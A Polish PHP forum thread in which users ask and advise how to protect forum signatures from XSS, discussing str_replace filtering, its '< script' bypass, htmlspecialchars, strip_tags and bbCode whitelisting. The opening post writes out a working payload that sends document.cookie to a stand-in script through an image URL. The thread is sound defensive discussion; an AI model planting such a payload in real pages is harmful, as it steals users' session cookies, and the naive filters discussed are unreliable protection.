Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Jak zabezpieczyć np. podpis na forum, przed atakami XSS
TomASS
post
Post #1





Grupa: Zarejestrowani
Postów: 1 660
Pomógł: 13
Dołączył: 9.06.2004
Skąd: Wrocław i okolice

Ostrzeżenie: (0%)
-----

Tak sobie myślę, że w większości for jest podpis użytkownika. Niektóre fora nie filtrują podpisów (np. mogę dać w podpisie obrazek itp.) a jakby tak dać:

[HTML] pobierz, plaintext 
  1. <script type="text/javascript">
  2. var adr = 'zly_skrypt.php?ciasteczka=' + escape(document.cookie);
  3. var obr = '<IMG src="' + adr + '">';
  4. document.write(obr);
  5. </SCRIPT>
[HTML] pobierz, plaintext


To się chyba nazywa atak XSS.

Jak się przed tym zabezpieczyć, aby np. akceptował obrazki, odnośniki itp. a nie akceptował "złych skryptów"?
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
marcini82
post
Post #2





Grupa: Zarejestrowani
Postów: 190
Pomógł: 1
Dołączył: 20.05.2005
Skąd: Poznań

Ostrzeżenie: (0%)
-----

Ja na poczatek wywalam (przy pomocy str_replace()) z danych od uzytkownika ciag '<script'
Go to the top of the page
+Quote Post
LonelyKnight
post
Post #3





Grupa: Zarejestrowani
Postów: 240
Pomógł: 13
Dołączył: 1.06.2007
Skąd: Wrocław

Ostrzeżenie: (0%)
-----

Cytat(marcini82 @ 15.02.2006, 17:23:48 ) *
Ja na poczatek wywalam (przy pomocy str_replace()) z danych od uzytkownika ciag '<script'


A co jeśli zamiast '<script' będzie '< script'? (IMG:http://forum.php.pl/style_emoticons/default/Rkingsmiley.png) ...bo coś mi się wydaje, że przeglądarka to łyknie a str_replace() nie bardzo (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

Cytat
Czy jak użyje htmlspecialchars($roz) to uchroni mnie to na 100% przed atakiem wpisania w zmienna złośliwego kodu??


htmlspecialchars() wyświetla znaki specjalne a nie ich interpretację. Po co wyświetlać np. 

[HTML] pobierz, plaintext 
  1. <a href="jestemzly.php">zuuuło</a>
[HTML] pobierz, plaintext


Jak takie coś Ci odpowiada to okej ale lepiej użyć strip_tags(), które usunie znaczniki php i html.

Rozwiązanie zaproponowane przez Ociu wydaję się najlepsze jednak proponowałbym jeszcze zwrócić uwagę na obecność "%" w przesyłanych danych. Czasami może zdarzyć się, że zapisując niektóre znaki w ASCII czy UNICODE uda się ominąć niektóre zabezpieczenia (IMG:http://forum.php.pl/style_emoticons/default/guitar.gif)
Go to the top of the page
+Quote Post

Posty w temacie
- TomASS   Jak zabezpieczyć np. podpis na forum   15.02.2006, 12:19:34
- - Ociu   Daj tylko dozwolone znaki - bbCode.   15.02.2006, 12:29:25
- - marcini82   Ja na poczatek wywalam (przy pomocy str_replace())...   15.02.2006, 16:23:48
|- - LonelyKnight   Cytat(marcini82 @ 15.02.2006, 17:23:4...   10.07.2007, 20:56:34
- - gladiror   Wrócę może do tego tematu bo mam konkretne pytanie...   10.07.2007, 19:35:39
- - maxserwer   A mi się wydaje że tego przeglądarka może nie łykn...   10.07.2007, 22:30:16
- - gladiror   użyłem htmlspecialchars i wyswietla mi w...   10.07.2007, 23:40:51
- - flv   Przecież na tym polega działanie tej funkcji, zami...   10.07.2007, 23:54:28
- - marcini82   CytatA co jeśli zamiast '<script...   11.07.2007, 06:45:48
- - LonelyKnight   Cytat(marcini82 @ 11.07.2007, 07:45:4...   11.07.2007, 07:27:19

« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 11.10.2025 - 03:28
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn